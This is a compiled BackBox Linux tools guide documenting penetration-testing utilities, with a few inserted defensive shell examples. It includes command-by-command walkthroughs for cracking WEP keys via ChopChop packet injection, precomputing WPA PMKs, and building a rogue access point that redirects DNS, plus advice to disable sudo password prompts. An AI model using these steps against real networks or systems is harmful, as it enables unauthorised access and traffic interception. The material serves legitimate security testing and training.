BackBox Tools Guide

WhatWeb is a web scanner included in BackBox Linux. It identifies websites, web servers, content management systems (CMS), frameworks, and other technologies on websites. The tool scans target URLs and outputs detailed information about the technologies detected. It has options to control the verbosity of output and to output results in formats like verbose, brief log, and XML. WhatWeb includes plugins that can be updated to detect new technologies and provides identification of website components for security assessments and debugging purposes.

Uploaded by minardmi

Category: Tools usage

In this section you will find documentation on the tools included in BackBox Linux. Our goal is to provide complete documentation for each tool, which users can consult to become more familiar with it.
Get involved and help us write high-quality documentation.

Subcategories
This category has the following 7 subcategories, out of 7 total.

Documentation & Reporting
Exploitation
Information Gathering
Miscellaneous
Privilege Escalation
Vulnerability Assessment
Wireless Analysis

Dradis

Dradis
Home page: http://dradisframework.org
Dradis guides: http://guides.dradisframework.org
Dradis is an easy-to-use and very effective system for sharing information during penetration tests (see [1]).
For tutorials and videos visit [2] and [3].

Installation
You just need to open up a terminal and type:
$ sudo apt-get install dradis
This will pull in all of the related dependencies. You will then have the following new entries in the BackBox main menu:
Auditing > Documentation & Reporting > Dradis
and
Services > dradis > (dradis reset / dradis start)
After the installation you need to run the dradis reset service, so that the "missing gems" are installed into your Ruby installation. Most likely you will see the following message:
[...]
Some Ruby gems are missing, do you want to install them now? [y]
Type y and you will get:
Ok then, I am going to run bundle install for you,
then you should run this script again.
[...]
Wait until the following message is displayed:
Your bundle is complete! Use `bundle show [gemname]`
to see where a bundled gem is installed.
Now run the dradis reset service once again:
The Gemfile's dependencies are satisfied
The config file [config/database.yml.template] was found not to be ready to use.
Do you want to initialize it? [y]es | [N]o | initialize [a]ll
Just type y and wait until the following output is displayed:
[...]
** Saving backup...            [ DONE ]
** Backup Saved as: /opt/dradis/server/backup/dradis_2011-xx-xx_1.zip
** Deleting all attachments... [ DONE ]
** Cleaning database...        [ DONE ]
** Seeding database...         [ DONE ]
** Deleting all log files...   [ DONE ]
To check your installation you may also want to run the dradis verify service. If the installation has been successful you will see:
Dradis Framework dependencies verification script
[...]
Running Standard checks.
[...]
Congratulations. You seem to be ready to run the Dradis Framework.
[...]
Now your Dradis installation is complete and perfectly working.

Basic Usage
To run Dradis you need to run the dradis start service:
Services > dradis > dradis start
then navigate through the menu and click on Dradis:
Auditing > Documentation & Reporting > Dradis
The first time, your browser will be taken to the wizard:
https://localhost:3004/wizard
On subsequent starts, during initialisation, you will be asked to provide a password and to create or open a project:
https://localhost:3004/sessions/init


Armitage

How to start Armitage


About
Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets,
recommends exploits, and exposes the advanced capabilities of the framework. Armitage aims to
make Metasploit usable for security practitioners who understand hacking but don't use Metasploit
every day. If you want to learn Metasploit and grow into the advanced features, Armitage can help
you.

Update Metasploit
sudo msfupdate

How to start Armitage


Before starting Armitage you need PostgreSQL installed on your system and a database configured for Metasploit (the steps are described on the Metasploit page of this guide).
Once the database is ready, navigate through the menu:
Auditing > Exploitation > Network Exploitation > Armitage
When Armitage starts, a connection pop-up appears: click Connect and leave the other parameters at their defaults.
If the Metasploit RPC server is not running, Armitage will ask whether you would like to start it; click Yes. A progress bar then shows the status of the connection to the database.
The Metasploit RPC server starts as a background service. You will see the "connection refused" message several times; do not worry about it, it only means Armitage is still polling a server that is not ready yet.
If you experience problems connecting to the database, set your own username and password by editing the file:
sudo nano /opt/config/database.yml

Category: Network Exploitation

Metasploit
How to use Metasploit with postgresql


About
The Metasploit Framework is both a penetration testing system and a development platform for
creating security tools and exploits. The framework is used by network security professionals to
perform penetration tests, system administrators to verify patch installations, product vendors to
perform regression testing, and security researchers world-wide. The framework is written in the
Ruby programming language and includes components written in C and assembler.

Update Metasploit
user@backbox:~$ sudo msfupdate

Database installation
Postgresql is the recommended database:
user@backbox:~$ sudo apt-get install postgresql libpgsql-ruby libpq-dev
user@backbox:~$ sudo gem install pg
Become the system postgres user:
user@backbox:~$ sudo su postgres
Creating a database user:
postgres@backbox:~$ createuser -D -P -R -S backbox
Enter password for new role: backbox
Enter it again: backbox
Creating a database:
postgres@backbox:~$ createdb --owner=backbox metasploit4
postgres@backbox:$ exit

Configure Metasploit
Start the framework, then enter the following commands:
msf > db_connect backbox:[password]@127.0.0.1:5432/metasploit4
or simply:
msf > db_connect -y /opt/backbox/config/database.yml
msf > workspace -a MyProject

Enable the database on startup


cat > ~/.msf4/msfconsole.rc <<'EOF'
db_connect backbox:[password]@127.0.0.1:5432/metasploit4
EOF
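As an added example (not part of the BackBox wiki), the following POSIX shell functions write the msfconsole.rc file described above and check that it is readable only by its owner, since the file stores the PostgreSQL password in clear text. The user, database, host and port are the ones used on this page; the password is a constructed placeholder and MSF_HOME is an assumed override (defaulting to $HOME) so the functions can be exercised outside the real home directory.

```shell
#!/bin/sh
# Added example, not from the BackBox wiki: create ~/.msf4/msfconsole.rc with the
# db_connect line used on this page and keep it owner-only (mode 0600), because the
# file contains the PostgreSQL password in clear text.

# Build the db_connect line: $1 user, $2 password, $3 host, $4 port, $5 database.
msf_db_connect_line() {
    printf 'db_connect %s:%s@%s:%s/%s\n' "$1" "$2" "$3" "$4" "$5"
}

# Write the rc file under $MSF_HOME/.msf4 (MSF_HOME is an assumed override used for
# testing; it defaults to $HOME). Same arguments as msf_db_connect_line.
# Prints the path of the file written.
write_msf_rc() {
    rcdir="${MSF_HOME:-$HOME}/.msf4"
    rcfile="$rcdir/msfconsole.rc"
    # A restrictive umask makes the directory and the file private from the moment
    # they are created, instead of being world-readable until a later chmod.
    old_umask=$(umask)
    umask 077
    mkdir -p "$rcdir"
    msf_db_connect_line "$@" > "$rcfile"
    umask "$old_umask"
    printf '%s\n' "$rcfile"
}

# Symbolic permission string of a file, e.g. "-rw-------" (first 10 columns of ls -ld).
file_mode() {
    ls -ld "$1" | cut -c1-10
}

# Exit status 0 when the file is readable and writable only by its owner.
is_owner_only() {
    [ "$(file_mode "$1")" = "-rw-------" ]
}

# Usage (password is a constructed placeholder):
#   rc=$(write_msf_rc backbox 'changeme' 127.0.0.1 5432 metasploit4)
#   is_owner_only "$rc" && echo "rc file is private"
```

The umask is set before the file is created rather than fixed afterwards with chmod, so there is no window in which another local user can read the credentials.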

Troubleshooting
If you run into issues, or need to modify the user or database, you can always use the psql command to do this. Assuming you're using IDENT authentication (the default on BackBox), you'll have to become the system's postgres user ('postgres' on BackBox) before you can modify users or databases with psql.

To list databases
postgres@backbox:~$ psql -l

How To drop a database


Postgres provides a handy 'dropdb' command.
postgres@backbox:~$ dropdb metasploit4

To drop a user
Postgres provides a handy 'dropuser' command.
postgres@backbox:~$ dropuser backbox
For more information, please visit: https://community.rapid7.com/docs/DOC-1268
Category: Network Exploitation

Sudo without password



I am sure you will agree with me that every time we enter "sudo" we are prompted for a password! Well, we can get around it this way:
Open a shell and type:
user@backbox:~$ sudo visudo
Add the following line to the END of the file:
<username> ALL=NOPASSWD: ALL
Replace <username> with your user name (without the <>).
Example:
michael ALL=NOPASSWD: ALL
Hit Ctrl + o + Enter to confirm, and Ctrl + x to save and exit.
That's it: from now on, every time you type "sudo", you won't be prompted for a password!
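As an added example (not part of the BackBox wiki), the following shell functions locate entries of the kind just added when reviewing a system's sudoers files: any non-comment line that grants passwordless execution of ALL commands. The sample sudoers fragment written by write_sample_sudoers is constructed for this example; the user and group names in it are placeholders.

```shell
#!/bin/sh
# Added example, not from the BackBox wiki: audit a sudoers-format file for entries
# that grant passwordless execution of ALL commands, which is what the
# "<username> ALL=NOPASSWD: ALL" line above does. Comment lines are ignored.

# Print every non-comment line whose command list after "NOPASSWD:" starts with ALL
# (possibly followed by further entries, e.g. "NOPASSWD: ALL, /bin/ls").
sudoers_nopasswd_all() {
    awk '!/^[[:space:]]*#/ && /NOPASSWD:[[:space:]]*ALL([[:space:]]*$|[[:space:]]*,)/' "$1"
}

# Number of such lines (always prints a number, 0 when there are none).
count_nopasswd_all() {
    sudoers_nopasswd_all "$1" | awk 'END { print NR }'
}

# A constructed sudoers fragment: two passwordless-ALL grants, one passwordless grant
# limited to a single command (not flagged), and one commented-out grant (not flagged).
write_sample_sudoers() {
    cat > "$1" <<'EOF'
Defaults env_reset
root ALL=(ALL:ALL) ALL
michael ALL=NOPASSWD: ALL
%admin ALL=(ALL) NOPASSWD: ALL
backup ALL=(root) NOPASSWD: /usr/bin/rsync
# alice ALL=NOPASSWD: ALL
EOF
}

# Usage on a real system (reading the files requires root):
#   for f in /etc/sudoers /etc/sudoers.d/*; do sudoers_nopasswd_all "$f"; done
```

The line for the backup user in the sample shows the narrower form of the same idea: NOPASSWD restricted to one command is not reported, because the check only flags grants whose command list is ALL. Any edit to these files can be syntax-checked before it is relied on with visudo -c -f FILE.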

Anonymous Surfing

BackBox Linux also includes a suite of tools that let users browse the web anonymously.
In this short tutorial we show how to set up, configure and use these tools, namely Tor and Polipo.

Tor and Polipo


Polipo is a small and fast caching web proxy. It is already installed on BackBox, so you only need to start it if you want to use it.
To do that:
service -> polipo -> polipo start
Starting Polipo brings up the web proxy on its default port, 8118.
Once the proxy is running we proceed with Tor, a free software implementation of second-generation onion routing, a system enabling its users to communicate anonymously on the Internet.
Tor is started from the Vidalia GUI in the desktop menu, or alternatively from a terminal:
sudo tor

Configure Tor on Firefox


Configuring the proxy in Firefox is straightforward. To browse anonymously, open the Firefox preferences:
Edit -> Preferences -> Advanced -> Network
Select Use custom proxy settings and fill in the HTTP Proxy section as follows:
127.0.0.1 Port: 8118
and the SOCKS Host section:
127.0.0.1 Port: 9050
To make sure everything is working, click Test Settings to check that the proxy is reachable; if that succeeds, go to https://check.torproject.org/ to verify that your traffic is actually going through Tor.
Enjoy your anonymity!

Whatweb

WhatWeb - Next generation web scanner


WhatWeb - Next generation web scanner. Version 0.4.6 by Andrew Horton aka urbanadventurer
from Security-Assessment.com
Homepage: http://www.morningstarsecurity.com/research/whatweb

Description
WhatWeb can be stealthy and fast, or thorough but slow. WhatWeb supports an aggression level to control the trade-off between speed and reliability. When you visit a website in your browser, the transaction includes many hints about which web technologies are powering that website. Sometimes a single page visit contains enough information to identify a website; when it does not, WhatWeb can interrogate the website further. The default level of aggression, called passive, is the fastest and requires only one HTTP request to a website. This is suitable for scanning public websites. More aggressive modes were developed for use in penetration tests.
Most WhatWeb plugins are thorough and recognise a range of cues from subtle to obvious. For example, most WordPress websites can be identified by the meta generator tag (e.g. <meta name="generator" content="WordPress 3.0.1" />), but a minority of WordPress websites remove this identifying tag; this does not thwart WhatWeb. The WordPress WhatWeb plugin has over 15 tests, which include checking the favicon, default installation files, login pages, and checking for /wp-content/ within relative links.

Example Usage
whatweb [options] <URLs>
Using WhatWeb on a handful of websites, standard WhatWeb output is in colour.
backbox@backbox:~$ whatweb google.it
http://google.it [301] X-XSS-Protection[1; mode=block], HTTPServer[gws], RedirectLocation[1] , UncommonHeaders[x-xss-protection], IP[74.125.39.103], Title[301 Moved], Country[UNITED STATES][US]
http://www.google.it/ [200] X-XSS-Protection[1; mode=block], HTTPServer[gws], UncommonHeaders[x-xss-protection], HTML5, IP[74.125.39.99], Cookies[NID,PREF], Title[Google], Country[UNITED STATES][US]

Verbose Output
backbox@backbox:~$ whatweb -v www.morningstarsecurity.com
www.morningstarsecurity.com/ [200]
http://www.morningstarsecurity.com [200] WordPress[3.0.1], Google-API[ajax/libs/jquery/1.3.2/jquery.min.js ], Google-Analytics[GA][791888], HTTPServer[Apache], UncommonHeaders[x-pingback], JQuery[1.4.2], Title[MorningStar Security], MetaGenerator[WordPress 3.0.1], RSSFeed[2] , MD5[59f20aef7452702787fff7ec46733501], Tag-Hash[2e45809b1f8a1ecf782757d8dbafbb08], Header-Hash[dba021c0aa225c8eede02c7dcc45b0d8], Footer-Hash[d0efcc9da7c8c45eb1e2ac5b8d5b354e]
Footer-Hash      => hash (string: d0efcc9da7c8c45eb1e2ac5b8d5b354e)
Google-API       => google javascript API (version: ajax/libs/jquery/1.3.2/jquery.min.js )
Google-Analytics => pageTracker = ...UA-123-1231 (string: GA,accounts: 791888)
HTTPServer       => server string (string: Apache)
Header-Hash      => hash (string: dba021c0aa225c8eede02c7dcc45b0d8)
JQuery           => script (version: 1.4.2)
MD5              => md5 hash of html (string: 59f20aef7452702787fff7ec46733501)
MetaGenerator    => meta generator tag (string: WordPress 3.0.1)
RSSFeed          => rss link type, rss link (string: http://www.morningstarsecurity.com/wp-content/themes/pyrmont-v2-white/style.css
Tag-Hash         => tag pattern hash (string: 2e45809b1f8a1ecf782757d8dbafbb08)
Title            => page title (string: MorningStar Security)
UncommonHeaders  => headers (string: x-pingback)
WordPress        => wp-content (certainty: 75), meta generator tag (version: 3.0.1), Relative /wp-content/ link

Log Output
There are currently 6 types of log output. They are:
--log-brief=FILE         Log brief, one-line output. Default output.
--log-full=FILE          Log verbose output (might be removed in future)
--log-xml=FILE           Log XML format
--log-json=FILE          Log JSON format
--log-json-verbose=FILE  Log JSON Verbose format
--log-errors=FILE        Log errors. This is usually printed to the screen in red.
You can output to multiple logs simultaneously by specifying multiple command line logging options.

Brief Logging
backbox@backbox:~$ whatweb --log-brief=b.log digg.com
http://digg.com [200] X-Powered-By[PHP/5.2.9-digg8], Cookies[1337,PHPSESSID,ccc], UncommonHeaders[keep-alive], Title[Digg - The Latest News Headlines, Videos and Images], HTTPServer[Apache], Mailto, Header-Hash[2df7eaaa4480f28013aaf48ae9266b84], MD5[24bc43e698e5d1388e836f5eee094fbe], Footer-Hash[ca2ffbc939969a2246cde196f0fc4841], Div-Span-Structure[828d809947c3c760d41c720c9203993b]
This is one connection per line and is search-able with grep.
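Because the brief log is one host per line, it can be sliced by technology with a little awk rather than with grep alone. As an added example (not from the BackBox wiki or the WhatWeb project), the functions below pull a named plugin's value out of each line and list the hosts whose value matches a pattern. They assume the brief format shown above: the URL, the status in square brackets, then comma-separated Plugin[value] entries. The log written by write_sample_whatweb_log is constructed for this example, modelled on the output on this page.

```shell
#!/bin/sh
# Added example, not from the BackBox wiki or the WhatWeb project: extract plugin
# values from WhatWeb brief (one-line-per-host) logs so scan results can be filtered
# by technology, e.g. every host that reports a given HTTPServer.

# Print "URL<TAB>value" for each log line where PLUGIN reported a value.
# $1 log file, $2 plugin name (e.g. HTTPServer). Only the first bracketed value is
# returned (Country[UNITED STATES][US] yields "UNITED STATES"); plugins that report
# no value at all (e.g. "HTML5", "Mailto") are not matched.
whatweb_field() {
    awk -v plugin="$2" '
    {
        # The plugin name must start a token: line start, a space or a comma,
        # so that "Hash" does not match inside "Header-Hash[...]".
        if (match($0, "(^|[ ,])" plugin "\\[[^]]*\\]")) {
            tok = substr($0, RSTART, RLENGTH)
            sub("^[ ,]*" plugin "\\[", "", tok)   # drop separator and "Plugin["
            sub("[]]$", "", tok)                   # drop the closing bracket
            print $1 "\t" tok                      # $1 is the URL at the line start
        }
    }' "$1"
}

# Print the URLs whose PLUGIN value matches the extended regex RE.
# $1 log file, $2 plugin name, $3 regex.
whatweb_hosts_where() {
    whatweb_field "$1" "$2" | awk -F '\t' -v re="$3" '$2 ~ re { print $1 }'
}

# Constructed brief-log sample, in the format shown above.
write_sample_whatweb_log() {
    cat > "$1" <<'EOF'
http://google.it [301] X-XSS-Protection[1; mode=block], HTTPServer[gws], RedirectLocation[http://www.google.it/], IP[74.125.39.103], Title[301 Moved], Country[UNITED STATES][US]
http://www.google.it/ [200] X-XSS-Protection[1; mode=block], HTTPServer[gws], HTML5, IP[74.125.39.99], Cookies[NID,PREF], Title[Google], Country[UNITED STATES][US]
http://digg.com [200] X-Powered-By[PHP/5.2.9-digg8], Cookies[1337,PHPSESSID,ccc], Title[Digg - The Latest News Headlines, Videos and Images], HTTPServer[Apache], Mailto
EOF
}

# Usage:
#   write_sample_whatweb_log scan.log
#   whatweb_hosts_where scan.log X-Powered-By '^PHP/5'   # hosts advertising PHP 5.x
```

Values may themselves contain commas and spaces (the Title entry above does), which is why the parser matches up to the closing bracket instead of splitting the line on commas.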

XML Logging
The XML logging is currently naive and may change. Please contact me if you have suggestions.
whatweb --log-xml x.log digg.com

Plugins
Matches are made with:
Text strings (case sensitive)
Regular expressions
Google Hack Database queries (limited set of keywords)
MD5 hashes
URL recognition
HTML tag patterns
Custom ruby code for passive and aggressive operations
Show the plugin list:
backbox@backbox:~$ whatweb -l
To view more detail about a plugin or plugins:
backbox@backbox:~$ whatweb -I phpBB

Category: Web Applications Analysis

Crunch

Crunch
Homepage: http://sourceforge.net/projects/crunch-wordlist/
Crunch is a wordlist generator which can use a default character set or a character set you specify.
Crunch can generate all possible combinations and permutations of words.

Usage
backbox@backbox:~$ crunch [minlength] [maxlength] [charset] -o path/wordlist.txt

Example Usage
backbox@backbox:~$ crunch 4 4 ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 -o /home/username/wordlist.txt
Specify the minimum length and maximum length of the words in the wordlist:
backbox@backbox:~$ crunch 4 4
Specify a character set to create the wordlist:
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
Specify a path to save the output wordlist file, for instance "wordlist.txt":
-o /home/username/wordlist.txt

Charset
A charset is a set of characters; it can be chosen from the file charset.lst.

Charset Example
The available charsets are listed in the file charset.lst; to use one of them (here mixalpha-sv):
backbox@backbox:~$ crunch 4 4 -f charset.lst mixalpha-sv -o /home/username/Desktop/wordlist.txt

Category: Password Cracking

Aircrack-ng

ChopChop WEP Cracking


This is a small guide on how to crack a WEP key with the ChopChop attack with no clients.
Let's assume the following:
ExampleAP is going to be the ESSID (ap name) of the access point you want to crack
00:25:FE:E1:12:43 is the BSSID (mac address) of the ap
The target ap is on channel 10
Your wireless interface supports the injection and its name is wlan0
00:11:22:33:44:55 is your wlan0 mac address

Scan for available WEP access points


First of all, make sure your wlan0 interface is not bound to any existing AP. To check:
ps -aux | grep dhclient | grep wlan0
and, if needed, kill the dhclient process.
Then put wlan0 in monitor mode:
user@backbox # sudo airmon-ng start wlan0
You will get a mon0 interface (the wlan0 monitor interface). Start airodump-ng to scan for live WEP networks:
user@backbox # sudo airodump-ng --encrypt WEP mon0
Wait for a while. Once you have found your target AP, take note of its ESSID (name), channel and BSSID (hardware address) and close airodump-ng with CTRL+C.

Monitor the channel

Stop the monitor interface, and restart it on the AP channel:


user@backbox # sudo airmon-ng stop mon0
user@backbox # sudo airmon-ng stop wlan0
user@backbox # sudo airmon-ng start wlan0 10

Fake AP authentication
Once you have your mon0 on channel 10, start a fake authentication with the command:
user@backbox # sudo aireplay-ng -1 0 -e ExampleAP -a 00:25:FE:E1:12:43 -h 00:11:22:33:44:55 mon0

Collecting the packets


Start collecting some packets with:
user@backbox # sudo aireplay-ng -4 -h 00:11:22:33:44:55 -b 00:25:FE:E1:12:43 mon0
Wait until aireplay-ng finds a packet you can use to forge a new one and asks you for confirmation; this will generate a .xor file.

Forge an ARP packet


Once aireplay-ng has found a useful packet, forge a new (ARP) packet with packetforge-ng:
user@backbox # packetforge-ng -0 -a 00:25:FE:E1:12:43 -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y packet.xor -w forged-arp-packet
(Replace 'packet.xor' with the name of the .xor file generated by aireplay-ng.)
Now you have your 'forged-arp-packet' packet to inject.

Capture data
In a new terminal, start capturing AP data:
user@backbox # sudo airodump-ng -c 10 --bssid 00:25:FE:E1:12:43 mon0

Inject the ARP packet


And start the packet injection:
user@backbox # sudo aireplay-ng -2 -r forged-arp-packet mon0

WEP Cracking
Once the injection has started, you should see a LOT of captured data in airodump-ng; when you have enough, start the cracking process:
user@backbox # aircrack-ng -b 00:25:FE:E1:12:43 *.cap

Use airolib-ng to generate precomputed PMKs


This guide shows how to create a database of precomputed Pairwise Master Keys for a given ESSID.
First of all, create a file called (for instance) "myessid.txt" containing the ESSID we want to generate PMKs for:
user@backbox # echo 'essid-name' > myessid.txt
Then, let's create the main db (example-db for instance) importing the essid :
user@backbox # airolib-ng example-db --import essid myessid.txt
Let's import a wordlist file (passwords.txt in the following example):
user@backbox # airolib-ng example-db --import passwd passwords.txt
Clean the db:
user@backbox # airolib-ng example-db --clean all
Let's start the PMKs computing with:
user@backbox # airolib-ng example-db --batch
The computation will take a while, in the meantime take a coffee and, if you want to check the db
status, just run the command:
user@backbox # airolib-ng example-db --stats
At the end, you will be able to use the db with aircrack:
user@backbox # aircrack-ng -r example-db psk*.cap

How to create a rogue (fake) access point


Here there's a little guide on how to create a rogue access point, you are going to need:
An external wifi adapter to connect to the internet (wlan1)
A gateway (for instance 192.168.1.1)
An internal wifi adapter to create the rogue AP (wlan0)

Configure the dhcp server


Open a terminal and edit the DHCP server configuration:
nano /etc/dhcp3/dhcpd.conf
Copy the following configuration into the dhcpd.conf file:
ddns-update-style ad-hoc;
default-lease-time 600;

max-lease-time 7200;
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
option routers 192.168.2.129;
option domain-name-servers 4.2.2.2;
range 192.168.2.130 192.168.2.140;
}

Then save and close the file with CTRL + X -> Y -> ENTER.

Create the rogue AP and put the wifi in monitor mode


Use the following command:
airmon-ng
airmon-ng start wlan0
airbase-ng -e "FAKE-AP-NAME" -c 9 mon0
This will create a tap interface (ath0) and start the rogue AP called "FAKE-AP-NAME" on channel 9; you will see the following output:
20:54:01 Create tap interface mon0
20:54:01 Trying to set MTU on ath0 to 1500
20:54:01 Trying to set MTU on mon0 to 1800
20:54:01 Access Point with BSSID 00:242:A1:40:8E started

Set the subnet and the gateway


ifconfig ath0 up
ifconfig ath0 192.168.2.129 netmask 255.255.255.128
route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129

Start the DHCP daemon


mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid ath0

Setup iptables rules


iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --table nat --append POSTROUTING --out-interface wlan1 -j MASQUERADE
iptables --append FORWARD --in-interface ath0 -j ACCEPT
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.1.1
Now you have your rogue AP running! :)
Category: Cracking

Pyrit

Pyrit is a great tool for WPA/WPA2-PSK cracking. It brings the power of multi-core platforms such as ATI-Stream, Nvidia CUDA and OpenCL to brute-force attacks on wireless networks.
For more information, please refer to the following link: http://code.google.com/p/pyrit/
These are the main features:
GPU and CPU Computing
Precomputed Hash with/out Database
Live Capture and Cracking
Analysis and Cleaning of useless captured packet
Direct use of dictionary and cap file compressed in gzip format
Distributed Wpa Cracking


Requirements
You need to install the proper drivers and toolkit for your video-card:
How to install Nvidia CUDA drivers and toolkit
How to install AMD driver and AMD APP SDK

Installation
First, you need to install the main module:
sudo apt-get install python-dev libssl-dev libpcap-dev zlib1g-dev
svn checkout http://pyrit.googlecode.com/svn/trunk/ $HOME/pyrit_svn
cd $HOME/pyrit_svn/pyrit
python setup.py build
sudo python setup.py install --record pyrit_file.txt
At this point you need to install other support modules according to your platform:

NVIDIA-CUDA
cd $HOME/pyrit_svn/cpyrit_cuda
python setup.py build
sudo python setup.py install --record cuda_file.txt

AMD-OpenCL
cd $HOME/pyrit_svn/cpyrit_opencl
sed -i 's/ATISTREAMSDKROOT/AMDAPPSDKROOT/g' setup.py
python setup.py build
sudo python setup.py install --record opencl_file.txt

AMD-APP and CAL++


This module makes use of the CAL++ library, which you need to install. It allows AMD CAL kernels to be written directly in C++, so it is intended to give better performance in general. It should be supported by AMD-APP-SDK up to version 2.5.
sudo apt-get -y install cmake libboost-date-time-dev
svn co https://calpp.svn.sourceforge.net/svnroot/calpp/trunk $HOME/calpp
cd $HOME/calpp
sed -i.bak 's/ATISTREAMSDKROOT/AMDAPPSDKROOT/g' CMakeLists.txt
cmake .
make

sudo make install


cd $HOME/pyrit_svn/cpyrit_calpp
sed -i.bak -e 's/ATISTREAMSDKROOT/AMDAPPSDKROOT/g' -e "s/'include'/'include\/CAL'/" -e 's/0.4.0-dev/0.4.1-dev/' setup.py
python setup.py build
sudo bash -c "export AMDAPPSDKROOT=/opt/AMDAPP && python setup.py install --record calpp_file.txt"
then reboot.

Uninstall
cat $HOME/pyrit_svn/pyrit/pyrit_file.txt | sudo xargs rm -rf
cat $HOME/pyrit_svn/cpyrit_cuda/cuda_file.txt | sudo xargs rm -rf
cat $HOME/pyrit_svn/cpyrit_opencl/opencl_file.txt | sudo xargs rm -rf
cat $HOME/pyrit_svn/cpyrit_calpp/calpp_file.txt |sudo xargs rm -rf
rm -rf $HOME/pyrit_svn

Using Pyrit with Postgresql


Postgresql Installation
sudo apt-get install python-sqlalchemy python-psycopg2 postgresql
sudo su postgres
createuser -D -P -R -S backbox
createdb -O backbox pyrit
exit
sed -i 's|file://|postgres://backbox:[password]@localhost/pyrit|' ~/.pyrit/config

Usage
Pyrit 0.4.1-dev (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Usage: pyrit [options] command
Recognized options:
  -b               : Filters AccessPoint by BSSID
  -e               : Filters AccessPoint by ESSID
  -h               : Print help for a certain command
  -i               : Filename for input ('-' is stdin)
  -o               : Filename for output ('-' is stdout)
  -r               : Packet capture source in pcap-format
  -u               : URL of the storage-system to use
  --all-handshakes : Use all handshakes instead of the best one
Recognized commands:
  analyze                 : Analyze a packet-capture file
  attack_batch            : Attack a handshake with PMKs/passwords from the db
  attack_cowpatty         : Attack a handshake with PMKs from a cowpatty-file
  attack_db               : Attack a handshake with PMKs from the db
  attack_passthrough      : Attack a handshake with passwords from a file
  batch                   : Batchprocess the database
  benchmark               : Determine performance of available cores
  benchmark_long          : Longer and more accurate version of benchmark (~10 minutes)
  check_db                : Check the database for errors
  create_essid            : Create a new ESSID
  delete_essid            : Delete a ESSID from the database
  eval                    : Count the available passwords and matching results
  export_cowpatty         : Export results to a new cowpatty file
  export_hashdb           : Export results to an airolib database
  export_passwords        : Export passwords to a file
  help                    : Print general help
  import_passwords        : Import passwords from a file-like source
  import_unique_passwords : Import unique passwords from a file-like source
  list_cores              : List available cores
  list_essids             : List all ESSIDs but don't count matching results
  passthrough             : Compute PMKs and write results to a file
  relay                   : Relay a storage-url via RPC
  selftest                : Test hardware to ensure it computes correct results
  serve                   : Serve local hardware to other Pyrit clients
  strip                   : Strip packet-capture files to the relevant packets
  stripLive               : Capture relevant packets from a live capture-source
  verify                  : Verify 10% of the results by recomputation

Category: Cracking

Siege

OpenSource HTTP Load Tester and Benchmarking Utility - Siege


Web site: http://www.joedog.org/index/siege-home

Description
Siege reports the total number of hits recorded, bytes transferred, response time, concurrency, and
return status. Most features are configurable with command line options which also include default
values to minimize the complexity of the program's invocation.
Siege allows you to stress a web server with 'n' number of users for 't' number of times, where n and t
are defined by the user. It records the duration time of the test as well as the duration of each single
transaction.
Siege reports the number of transactions, elapsed time, bytes transferred, response time, transaction
rate, concurrency and the number of times the server responded OK, that is status code 200. Siege
was designed and implemented by Jeffrey Fulmer in his position as Webmaster for Armstrong World Industries.

Example
Here is a simple example of using siege:
user@backbox # siege --concurrent=50 --internet --benchmark --time=20m http://www.someurl.com/index.html
Check siege man pages for more options .
Category: Stress Testing

Cms-explorer

CMS Explorer
CMS Explorer - Discover the CMS components behind the site
Homepage: http://code.google.com/p/cms-explorer/
Wiki: http://code.google.com/p/cms-explorer/wiki/Usage

Description
CMS Explorer is designed to reveal the specific modules, plugins, components and themes that various CMS-driven web sites are running.
Additionally, CMS Explorer can be used to aid in security testing. While it performs no direct
security checks, the "explore" option can be used to reveal hidden/library files which are not
typically accessed by web clients but are nonetheless accessible. This is done by retrieving the
module's current source tree and then requesting those file names from the target system. These
requests can be sent through a distinct proxy to help "bootstrap" security testing tools like Burp,
Paros, Webinspect, etc.
CMS Explorer can also search OSVDB for vulnerabilities with the installed components.
CMS Explorer currently supports module/theme discovery with the following products:
* Drupal
* Wordpress
* Joomla!
* Mambo
And exploration of the following products:
* Drupal
* Wordpress

Usage
backbox@backbox:~$ cms-explorer
*****************************************************************
WARNING: No osvdb.org API key defined, searches will be disabled.
*****************************************************************

ERROR: Missing -url

backbox@backbox:~$ cms-explorer -url url -type type [options]

Options:
  -bsproxy+     Proxy to route findings through (fmt: host:port)
  -explore      Look for files in the theme/plugin dir
  -help         This screen
  -osvdb        Do OSVDB check for finds
  -plugins      Look for plugins (default: on)
  -pluginfile+  Plugin file list
  -proxy+       Proxy for requests (fmt: host:port)
  -themes       Look for themes (default: on)
  -themefile+   Theme file list (default: themes.txt)
  -type+*       CMS type: Drupal, Wordpress, Joomla, Mambo
  -update       Update lists from Wordpress/Drupal (over-writes text files)
  -url+*        Full url to app's base directory
  -verbosity+   1-3

+ Requires value
* Required option

Options

* bsproxy (requires value): The proxy to route any found files through. Format can be like 'http://host:port/' , 'host:port' or just 'host'. If
* explore: Look for additional theme/plugin files. Only supported for Drupal and Wordpress.
* osvdb: Check osvdb.org for vulnerabilities in the installed components. Requires an API key to be in a file called osvdb.key.
* plugins: Look for plugins/module/component files. By default this is enabled and both plugins and themes will be checked.
* pluginfile+ (requires value): Alternative plugin file list.
* proxy+ (requires value): Proxy for base requests. Format can be like 'http://host:port/' , 'host:port' or just 'host'. If port is not specifi
* themes (requires value): Look for themes. By default this is enabled and both plugins and themes will be checked.
* themefile+ (requires value): Alternative theme file list.
* type+ (required, requires value): The CMS type to be tested: Drupal, Wordpress, Joomla/Mambo.
* update: Update the default lists from Wordpress and Drupal. This over-writes the current files with fresh copies.
* url+ (required, requires value): Full URL to the application's root directory (where the CMS is installed).
* verbosity+ (requires value): 1-3 in increasing levels of output.

Example Usage
Test for Wordpress plugins and themes against example.com, with low verbosity and explore for
additional files. Route all "found" items using the bootstrap proxy running on port 8080 of localhost.
